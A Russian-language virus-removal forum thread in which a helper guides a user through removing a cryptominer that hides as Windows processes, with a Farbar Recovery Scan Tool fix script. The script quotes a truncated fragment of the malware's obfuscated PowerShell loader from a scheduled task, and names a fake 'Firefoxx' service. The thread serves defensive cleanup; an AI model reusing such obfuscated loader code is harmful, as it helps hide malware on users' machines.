Перейти к содержанию

[РЕШЕНО] вирус который маскируется под системный процесс Телефон Microsoft Windows

Рекомендуемые сообщения

Опубликовано (изменено)

В нормальном режиме лечить бесполезно. Задача запуска пересоздается по новой.

Task: {5F48C27E-553C-4B8A-9C6A-D9E481C6969F} - System32\Tasks\dialersvc64 => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [455680 2024-02-14]

Возможно что при каждом новом запуске системы зловред создает новую задачу задачу, и удаляет старую. Так что по факту скриптом мы удаляем ту задачу (из лога), которой уже нет. Тут и выгрузка powershelll скорее всего не поможет, так как на момент создания логов, новая задача уже создана.

Изменено пользователем safety
Опубликовано

Microsoft SQL Server 2012  с какой целью используете?

Опубликовано

не знаю даже что это

Тут только систему сносить остается ?

Опубликовано

Переустановить всегда успеете. Надо все варианты очистки отработать.

Опубликовано
19 минут назад, sencity72 сказал:

не знаю даже что это

удивительно, но он у Вас установлен(?) с 2020 года. Возможно, что его использует в работе КриптоПро или Контур. Идеальным вариантом было бы деинсталляция всего, что с ними связано, и повторная установка (и настройка Вами) заново после избавления от майнера. Не знаю, насколько возможен для Вас этот вариант.

А запускаются компоненты Microsoft SQL Server 2012 через запуск служб MSSQL$ARGOGEO_P и SQLAgent$ARGOGEO_P. Можно попробовать отключить их запуск перед лечением.

Были несколько случаев с майнером, который воскресал через запуск задач самого MS SQL.

Отсюда вопросы:

1. Это возможно сделать?

2. Сможете ли отключить эти службы самостоятельно?

Опубликовано

1. возможно

2. я не знаю как их отключить

Опубликовано
18 минут назад, sencity72 сказал:

2. я не знаю как их отключить

Нажимаете комбинацию клавиш Win + R

В появившемся окне набираете services.msc и нажимаете ОК.

Находите указанные выше службы, запоминаете (записываете) на будущее текущее состояние их запуска и переводите службы в состояние Отключить. Подтверждаете нажатием ОК.

Перезагрузитесь и проверьте, что состояние запуска служб не изменилось после перезагрузки.

Если службы не запустятся, соберите только новый лог FRST.txt в обычном режиме, чтобы написать новый скрипт лечения.

Опубликовано

Выполнять написанный ниже скрипт строго в безопасном режиме

1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мышиКопировать)

Start::
CreateRestorePoint:
CloseProcesses:
HKLM\SOFTWARE\Policies\Microsoft\MRT: Ограничение <==== ВНИМАНИЕ
HKU\S-1-5-21-1488824550-1789792169-3620093603-1001\...\Run: [utweb] => "C:\Users\easen\AppData\Roaming\uTorrent Web\utweb.exe" /MINIMIZED (Нет файла)
Task: {6D7BE7D4-D8AF-455E-8F25-9D1572C784B6} - System32\Tasks\dialersvc64 => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [455680 2024-02-14] (Microsoft Windows -> Microsoft Corporation) -> "function Local:ogJHzbpDtWfI{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$bDbZxGFavHeNPU,[Parameter(Position=1)][Type]$OwTLvihyuH)$TWxWVrRuXIf=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+''+[Char](108)+''+'e'+'ct'+[Char](10 (запись имеет ещё 5094 символов). <==== ВНИМАНИЕ
S3 BITS_bkp; C:\WINDOWS\System32\svchost.exe [57528 2024-05-15] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ВНИМАНИЕ (отсутствует ServiceDLL)
S3 BITS_bkp; C:\WINDOWS\SysWOW64\svchost.exe [47040 2024-05-15] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ВНИМАНИЕ (отсутствует ServiceDLL)
S2 Firefoxx; C:\ProgramData\Moziila Corporation\Firefoxx.exe [22121472 2025-05-04] (Firefox) [Файл не подписан]
S3 WaaSMedicSvc_bkp; C:\WINDOWS\system32\WaasMedicSvc.dll [427520 2025-04-09] (Microsoft Windows -> Microsoft Corporation)
S3 wuauserv_bkp; C:\WINDOWS\system32\svchost.exe [57528 2024-05-15] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ВНИМАНИЕ (отсутствует ServiceDLL)
S3 wuauserv_bkp; C:\WINDOWS\SysWOW64\svchost.exe [47040 2024-05-15] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ВНИМАНИЕ (отсутствует ServiceDLL)
2025-05-04 14:06 - 2025-05-04 14:06 - 000000000 ____D C:\ProgramData\Moziila Corporation
2025-04-06 15:16 - 2025-04-06 15:16 - 000000165 ___HC C:\Users\easen\Desktop\~$Нижний Новгород.xlsx
Folder: C:\Users\easen\AppData\Local\Microsoft\CLR_v4.0\UsageLogs
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

• Обратите внимание: будет выполнена перезагрузка компьютера.

После перезагрузки жду новый FRST.txt из нормального режима. 

• Like (+1) 1
Опубликовано

+ новый Fixlog.txt,

Цитата

3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

• Согласен 1
Опубликовано

В дополнение к сообщению выше.

Источник бед возможно найден. Можете поискать в папках с MS SQL файл c именем master.mdf или подобным?

Опубликовано

вроде этот

Fixlog.txt

Источник бед возможно найден. Можете поискать в папках с MS SQL файл c именем master.mdf или подобным? 

не понял где искать ? -

Наблюдение - ноутбук перестал гудеть как самолет

ЦП в норме

Кажется помогло.

Опубликовано
4 минуты назад, sencity72 сказал:

не понял где искать ? -

В Проводнике откройте диск C и в строке поиска (в правом верхнем углу) напишите master.mdf

Если таковой будет найден, Проводник покажет его местоположение. Тогда пришлете его в архиве.

Если не найдет, тогда нужно будет в строке поиска написать *.mdf и может там отобразится нужное. Качественный скриншот нужно будет сделать в таком случае, чтобы можно было видеть имена файлов и среди них найти нужный.

Если я правильно понимаю, ранее о том, что Microsoft SQL Server 2012, SQL Server 2012 Database Engine установлены на компьютере Вы понятия не имели? Отключение служб никак не повлияло на работу Крипто Про и Контура? 

Для каких целей вообще используется Вами компьютер?

Опубликовано

нашел 4 файла - удалил их

Microsoft SQL Server 2012, SQL Server 2012 Database Engine - я не знаю что это и для чего... возможно устанавливая какую-нибудь игру - установил в комплекте... 

Крипто про и Контур - работает

Цели- основная работа (интернет, браузеры, офис....), фильмы, музыка, игры ...

Гость
Эта тема закрыта для публикации ответов.
  • Похожий контент

• Николай212322122
      Автор Николай212322122
      Переустановили винду в сервизном центре. По приходу домой обнаружил вирус realtek hd audio, который включается по автозагрузке и не дает скачать антивирусы. Dr web cureit получилось перекинуть через месенжер и сделать проверку, он нашел большое количество угроз. Но не все смог вылечить, я скачал Kaspersky virus removal tool и он тоже нашел вирусы. Я запускал несколько раз эти утелиты и вроде бы угроз больше не обнаруживается. Но в автозагрузках я опять вижу realtek hd audio выключенным с автозагрузок , хотя после первого сканирование он был вообще удален.

Сейчас Dr web cureit и Kaspersky virus removal tool ничего не находит и realtek hd audio выключен с автозагрузок и я могу вписывать антивирус в бразуер и он сразу не закрывается, так же могу зайти ProgramData. Но все равно realtek hd audio весит в автозагрузках и когда первый раз запускал Dr web cureit он написал что не все вылечил, так что есть подозрение что вирус еще на компьютере остался.

Подскажите пж, что делать?

Прикрепить логи от Dr web cureit не получаеться так как они больше 5 мб. Где получить логи от Kaspersky virus removal tool я не нашел. Подскажите как отправить логи
    • AndreyGrom89
      Автор AndreyGrom89
      Доброго времени суток. Недавно обнаружил повышенную нагрузку на ГП. В диспетчере задач было обнаружено два процесса microsoft network realtime inspection service, один из которых и грузил карту. Поиском в инете нашел инфу о возможном майнере. Выполнил рекомендации из поста, не на данном форуме, рекомендации помогли, но увы не надолго, после некоторого времени проблема появилась вновь. Сегодня наткнулся на этот форум с похожей темой. Проверял комп Defender`ом, он проблему не находил. Обнаружил данный "файл" в исключениях, удалил оттуда. По рекомендации с соседней темы скачал FRST, сделал проверку, результаты прикрепил. Какие дальнейшие действия можно применить??
      Addition.txt FRST.txt
    • Fasolka
      Автор Fasolka
      Обьект: app.dll             Путь: C:\Users\lucif\AppData\Local\Temp\310HkrIkW1H0uUQZkVZi2Qlb5qF\resources\app.asar.unpacked\dist\electron\assets\app.dll
    • Владхелп
      Автор Владхелп
      Здравствуйте,
      Недавно переносил файлы с флешки друга, после этого начал подвисать и греться ноутбук, защитник ничего не видит
      CollectionLog-2025.12.22-22.00.zip
    • shougo04
      Автор shougo04
      Всем привет. Первый раз пишу сюда, отчаялся сильно. Уже качал Malwarebytes который на компе выявил 1 троян, несколько значений реестра от программы DriverIdentifier и что-то ещё, что я забыл. После того как я всё это удалил, вручную почистил реестр от подозрительных, старых, лишних значений, всё равно тыкаю Диспетчер задач - нагрузка ЦП (не видюхи) 40%+ и при открытии диспетчера падает соответственно до 1-3%. Так же использовал программу M1nerSearch, которая так же удалила 4 файла и 1 значение реестра по-моему, лог сохранился, если что прикреплю. 

Я зашёл в Speccy и там обнаружил вкладку "планировщик задач" где увидел очень подозрительные процессы.  В планировщике задач обнаружил Client Helper(который MinerSearch как вирус определял), и Edgeupdate которые как я выяснил могут являться знаками наличия вируса. Вирусы получал крайне редко, и то очень давно, поэтому несильно шарю в них, извините.
      Я сейчас скачаю программу Revo uninstaller и попробую с помощью неё ещё что-нибудь сделать. Так же отмечу что вытаскивал кабель инета, устанавливал CCleaner, чистил комп, чистил реестр с помощью неё, потом обратно инет подключал. Так же исправлял ошибки реестра программой Wise Registry Cleaner.

На всякий случай прикрепил 2 лога от MinerSearch, 1-й в котором указаны кол-во запусков 1 это тот лог, который при первом запуске мне и показал 5 проблем. 
      2 лог это лог уже второй проверки после всех вышеописанных манипуляций с ПК, он не обнаружил проблем, но как видите они остались, так что хз.

Скрин подозрительной активности в Планировщике.

MinerSearch_12_17_2025_7-15-07_PM.log MinerSearch_12_17_2025_8-23-48_PM.log
  • Создать...